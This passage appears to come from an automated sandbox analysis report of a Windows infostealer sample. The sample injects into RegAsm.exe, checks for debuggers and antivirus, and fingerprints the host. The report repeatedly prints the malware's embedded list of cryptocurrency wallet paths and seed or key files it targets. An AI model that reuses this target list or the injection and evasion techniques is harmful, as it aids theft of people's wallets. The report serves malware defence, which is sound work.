                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_00418970 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,1_2_00418970
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004F05BF mov eax, dword ptr fs:[00000030h]0_2_004F05BF
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004F0665 mov eax, dword ptr fs:[00000030h]0_2_004F0665
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004F0612 mov eax, dword ptr fs:[00000030h]0_2_004F0612
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004F06D6 mov eax, dword ptr fs:[00000030h]0_2_004F06D6
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004F07C9 mov eax, dword ptr fs:[00000030h]0_2_004F07C9
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004F0873 mov eax, dword ptr fs:[00000030h]0_2_004F0873
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004F081E mov eax, dword ptr fs:[00000030h]0_2_004F081E
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004F08B0 mov eax, dword ptr fs:[00000030h]0_2_004F08B0
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004DD757 mov ecx, dword ptr fs:[00000030h]0_2_004DD757
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0040D090 CopyFileA,GetProcessHeap,RtlAllocateHeap,lstrlen,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrlen,memset,DeleteFileA,1_2_0040D090
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004A8405 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_004A8405
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0049726A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0049726A
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00497616 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00497616
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0041AA5F memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_0041AA5F
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0041FB38 SetUnhandledExceptionFilter,1_2_0041FB38
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0041BF87 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_0041BF87
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_19C42C8E IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_19C42C8E
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_19C442AF SetUnhandledExceptionFilter,1_2_19C442AF

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Source: C:\Users\user\Desktop\file.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5AJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_00411C50 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,1_2_00411C50
                    Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000Jump to behavior
                    Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000Jump to behavior
                    Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 424000Jump to behavior
                    Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 430000Jump to behavior
                    Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 643000Jump to behavior
                    Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 644000Jump to behavior
                    Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 1138008Jump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00496DE7 cpuid 0_2_00496DE7
                    Source: C:\Users\user\Desktop\file.exeCode function: EnumSystemLocalesW,0_2_004E4E2A
                    Source: C:\Users\user\Desktop\file.exeCode function: EnumSystemLocalesW,0_2_004E5019
                    Source: C:\Users\user\Desktop\file.exeCode function: GetLocaleInfoEx,0_2_00495A6A
                    Source: C:\Users\user\Desktop\file.exeCode function: GetLocaleInfoW,0_2_004E5B74
                    Source: C:\Users\user\Desktop\file.exeCode function: GetLocaleInfoEx,FormatMessageA,0_2_004724B7
                    Source: C:\Users\user\Desktop\file.exeCode function: GetACP,IsValidCodePage,GetLocaleInfoW,0_2_004F3037
                    Source: C:\Users\user\Desktop\file.exeCode function: EnumSystemLocalesW,0_2_004F3380
                    Source: C:\Users\user\Desktop\file.exeCode function: EnumSystemLocalesW,0_2_004F3402
                    Source: C:\Users\user\Desktop\file.exeCode function: EnumSystemLocalesW,0_2_004F34C3
                    Source: C:\Users\user\Desktop\file.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,0_2_004F3570
                    Source: C:\Users\user\Desktop\file.exeCode function: GetLocaleInfoW,0_2_004F3857
                    Source: C:\Users\user\Desktop\file.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_004F39CA
                    Source: C:\Users\user\Desktop\file.exeCode function: GetLocaleInfoW,0_2_004F3B11
                    Source: C:\Users\user\Desktop\file.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_004F3C13
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,1_2_004103D0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoA,LocalFree,1_2_00410449
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,1_2_19C42112
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,1_2_19C42112
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: EnumSystemLocalesW,1_2_19E1FF17
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetACP,IsValidCodePage,GetLocaleInfoW,1_2_19C4298C
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004E5BC2 GetSystemTimeAsFileTime,0_2_004E5BC2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_00410280 GetProcessHeap,HeapAlloc,GetUserNameA,1_2_00410280
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_00410360 GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA,1_2_00410360
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                    Source: Amcache.hve.6.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                    Source: Amcache.hve.6.drBinary or memory string: msmpeng.exe
                    Source: Amcache.hve.6.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                    Source: Amcache.hve.6.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
                    Source: RegAsm.exe, 00000001.00000002.2461606471.00000000014C5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2461606471.000000000144A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                    Source: RegAsm.exe, 00000001.00000002.2461606471.00000000014C5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ramFiles%\Windows Defender\MsMpeng.exe
                    Source: Amcache.hve.6.drBinary or memory string: MsMpEng.exe
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct

                    Stealing of Sensitive Information

                    barindex
                    Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                    Source: Yara matchFile source: 1.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.file.exe.450000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2129837394.000000000051F000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: file.exe PID: 4092, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 2632, type: MEMORYSTR
                    Source: RegAsm.exe, 00000001.00000002.2461606471.00000000014C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                    Source: RegAsm.exe, 00000001.00000002.2461606471.00000000014C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                    Source: RegAsm.exe, 00000001.00000002.2461606471.00000000014C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                    Source: RegAsm.exe, 00000001.00000002.2461606471.00000000014C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                    Source: RegAsm.exe, 00000001.00000002.2461606471.00000000014C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                    Source: RegAsm.exe, 00000001.00000002.2461606471.00000000014C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                    Source: RegAsm.exe, 00000001.00000002.2461606471.00000000014C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                    Source: RegAsm.exe, 00000001.00000002.2461606471.00000000014C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
